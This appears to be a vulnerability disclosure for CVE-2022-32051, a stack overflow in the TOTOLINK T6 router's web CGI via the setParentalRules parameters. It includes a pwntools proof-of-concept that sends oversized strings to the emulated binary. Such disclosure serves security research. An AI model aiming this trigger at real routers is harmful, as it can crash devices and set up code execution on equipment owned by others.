Headline
CVE-2022-32051: IoT-vuln/Totolink/T6-v2/2.setParentalRules at main · d1tto/IoT-vuln
TOTOLINK T6 V4.1.9cu.5179_B20201015 was discovered to contain a stack overflow via the desc, week, sTime, eTime parameters in the function FUN_004133c4.
The vulnerability exists in the router’s WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_004133c4 (at address 0x4133c4) gets the JSON parameter desc, week, sTime, eTime, but without checking its length, copies it directly to local variables in the stack, causing stack overflow:
from pwn import * import json
data = { "topicurl": "setting/setParentalRules", "addEffect": "0", "mac": "12:34:56:78", "desc": 'A’*0x400, "week": 'A’*0x400, "sTime": 'A’*0x400, "eTime": 'A’*0x400 }
data = json.dumps(data) print(data)
argv = [ "qemu-mipsel-static", "-g", "1234", "-L", "./root/", "-E", "CONTENT_LENGTH={}".format(len(data)), "-E", "REMOTE_ADDR=192.168.2.1", “./cstecgi.cgi” ]
a = process(argv=argv) a.sendline(data.encode())
a.interactive()